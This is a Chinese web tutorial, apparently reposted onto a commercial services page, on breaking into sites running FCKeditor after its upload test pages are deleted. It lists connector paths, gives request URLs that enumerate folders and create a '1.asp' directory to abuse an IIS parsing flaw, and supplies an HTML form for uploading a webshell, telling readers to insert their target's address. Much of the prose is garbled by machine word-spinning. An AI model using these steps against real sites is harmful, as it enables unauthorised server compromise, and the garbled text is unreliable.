|
|
|
联系客服020-83701501

解决Fckeditor删除所有上传页面如何上传入侵

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
设计Fckeditor删除所有上传页面如何上传入侵

好久没有脚本入侵了,今天因为插足了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,遏制了一次安检,结果是没有得胜,因为iis的文件剖析缝隙补上了,不外学到了一些Fckeditor在没有上传页面的情况下的入侵法子。

起首,你得必定下Fckeditor的版本。

/FCKeditor/editor/dialog/fck_about.html

其次,你必定下以下几个上传页面能否真的被删除了呢?

/FCKeditor/editor/filemanager/browser/default/browser.html
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
/FCKeditor/editor/filemanager/upload/test.html
/FCKeditor/editor/filemanager/connectors/test.html
/FCKeditor/editor/filemanager/connectors/uploadtest.html

嗯,好吧,都曾经删除了,真是太可怜了,怎么办,确认下这些文件有哪一个存在的么

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
/fckeditor/editor/filemanager/connectors/asp/connector.asp
/fckeditor/editor/filemanager/connectors/php/connector.php

假如存在,那太好了,你可能继续看上来了,我这里以aspx的为例

1.搜查Media目录下的文件:

/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F

赤色Media可能幻化为File梗概image,相应的进入文件梗概图片目录下

2.独霸iis剖析缝隙建树1.asp非凡目录

fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp

赤色的是对应的Media目录,蓝色的口角凡目录名字

3.建树表单,上传webshell到非凡目录

<form id=”frmUpload” enctype=”multipart/form-data” action=”http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp” method=”post”>
Upload a new file:<br>
<input type=”file” name=”NewFile” size=”50″><br>
<input id=”btnUpload” type=”submit” value=”Upload”>
</form>

将以上代表生活糊口生活生计为HTML名堂,http://www.91ri.org修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为非凡目录名。

结尾的一些提醒

上 传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现法子是一个上传好了的文件名,全路径必须你本身组合,我信托你是会的。假如访问之后发现无奈 访问,试着上传一张准确的图片,再遏制访问,假如访问得胜,说明规划员曾经补上了IIS路径剖析缝隙,那你得另找前程了。
本文摘自www.52sky.org由Internet安然攻防研究室(www.91ri.org) 动态安然小组收集整顿.转载本文请驰誉原文地址及原作者版权动态。

数安新闻+更多

证书相关+更多